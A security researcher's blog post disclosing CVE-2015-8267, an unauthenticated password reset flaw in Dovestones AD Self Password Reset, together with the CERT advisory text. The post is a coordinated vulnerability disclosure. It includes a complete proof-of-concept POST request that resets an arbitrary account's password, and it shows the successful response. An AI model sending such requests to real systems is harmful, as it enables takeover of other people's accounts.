Adam Caudill

Security Leader, Researcher, Developer, Writer, & Photographer

Dovestones Software AD Self Password Reset (CVE-2015-8267)

Software AD Self Password Reset v3.0 by Dovestones Software contains a critical vulnerability in the password change functionality, that allows unauthenticated users to change the password of arbitrary accounts.

The vendor has been working with customers to upgrade them to a fixed version.

The /Reset/ChangePass function doesn’t validate that the validation questions have been answered, or validate that the account in question is enrolled. This allows an attacker to reset any account that the service account is able to reset, even if they aren’t enrolled.

The PasswordReset.Controllers.ResetController.ChangePasswordIndex() method in PasswordReset.dll fails to properly validate the user, and performs the password reset on arbitrary accounts.

Sample:

POST /PasswordReset/Reset/ChangePass HTTP/1.1
Host: apps.example.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://example.com/PasswordReset/Reset
Content-Length: 162
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

command=Next&NewPassword=Password1&ConfirmPassword=Password1&HomeUrl=%2FPasswordReset&DomainName=example.com&Username=testuser&X-Requested-With=XMLHttpRequest

Successful response:

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 631
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNetMvc-Version: 4.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ARR/3.0
X-Powered-By: ASP.NET
Date: Sat, 17 Oct 2015 03:13:31 GMT

<form action="/PasswordReset/Reset?Length=5" data-ajax="true" data-ajax-failure="HandleError" data-ajax-method="POST" data-ajax-mode="replace" data-ajax-update="#content" data-ajax-url="/PasswordReset/Reset/Confirm" id="pr-reset-success" method="post">    <div class="field-wrapper">
        <fieldset>
            <span>Password Reset</span>

            <div>
                <label>Congratulations! Your password has been reset.</label>
            </div>
                <div>
                    <button type="submit" name="command">Finish</button>
                </div>
        </fieldset>
    </div>
</form>

VU#757840 – Dovestones Software AD Self Password Reset fails to properly restrict password reset request to authorized users

CVE: CVE-2015-8267

KEYWORDS:
dovestones
access control

OVERVIEW

Dovestones Software AD Self Password Reset fails to properly validate users, which enables an unauthenticated attacker to reset passwords for arbitrary accounts.

DESCRIPTION

CWE-284: Improper Access Control – CVE-2015-8267

Dovestones Software AD Self Password Reset contains a vulnerable method PasswordReset.Controllers.ResetController.ChangePasswordIndex() in PasswordReset.dll that fails to validate the requesting user. An attacker can reset passwords for arbitrary accounts by manipulating web application requests that call the vulnerable method.

IMPACT

A remote, unauthenticated attacker can reset passwords for arbitrary accounts where usernames are known or can be guessed.

SOLUTION

Apply an update

The vendor has worked directly with customers to apply updates for this and other vulnerabilities. Users who have not received an update are encouraged to contact the vendor.

REFERENCES

http://www.dovestones.com/active-directory-password-reset/
https://cwe.mitre.org/data/definitions/284.html

CREDIT

Thanks to Adam Caudill for reporting this vulnerability.

This document was written by Joel Land.

Special thanks to Dovestones for their quick response, and US CERT for their help in coordinating disclosure.

Adam Caudill

Related Posts

  • Exploiting the Jackson RCE: CVE-2017-7525

    Earlier this year, a vulnerability was discovered in the Jackson data-binding library, a library for Java that allows developers to easily serialize Java objects to JSON and vice versa, that allowed an attacker to exploit deserialization to achieve Remote Code Execution on the server. This vulnerability didn’t seem to get much attention, and even less documentation. Given that this is an easily exploited Remote Code Execution vulnerability with little documentation, I’m sharing my notes on it.

  • PL/SQL Developer: HTTP to Command Execution

    While looking into PL/SQL Developer – a very popular tool for working with Oracle databases, to see how it encrypts passwords I noticed something interesting. When testing Windows applications, I make it a habit to have Fiddler running, to see if there is any interesting traffic – and in this case, there certainly was. PL/SQL Developer has an update mechanism which retrieves a file containing information about available updates to PL/SQL Developer and other components; this file is retrieved via HTTP, meaning that an attacker in a privileged network position could modify this file.

  • PL/SQL Developer: Nonexistent Encryption

    (See here for another issue discovered during this research; Updates over HTTP & Command Execution.) PL/SQL Developer by Allround Automations has an option to store the user’s logon history with passwords – the passwords are encrypted with a proprietary algorithm. At this point, you should know how this is going to go. For those that don’t know, PL/SQL Developer is a tool for developers and database administrators to access Oracle – an essential tool in many enterprise environments.

  • phpMyID: Fixing Abandoned OSS Software

    phpMyID is a simple solution for those that want to run their own OpenID endpoint – the problem is that its author stopped maintaining the project in 2008. Despite this, there’s still quite a few people that use it, because it’s the easiest single-user OpenID option available. Unfortunately, the author didn’t follow best practices when building the software, and as a result multiple security flaws were introduced. In 2008, a XSS was identified and never fixed (CVE-2008-4730), in the years since then it seems the software has been below the radar.

  • VICIDIAL: Multiple Vulnerabilities

    Update: The VICIDIAL team has publicly released a new version that, according to them, has corrected the issues I’ve pointed out here. Please make sure you are using the latest version available. If you aren’t sure if your instance is safe, contact your friendly local penetration tester to verify it’s secure as you expect it to be. Update: The SQL Injection vulnerability has been assigned CVE-2013-4467, and Command Injection assigned CVE-2013-4468.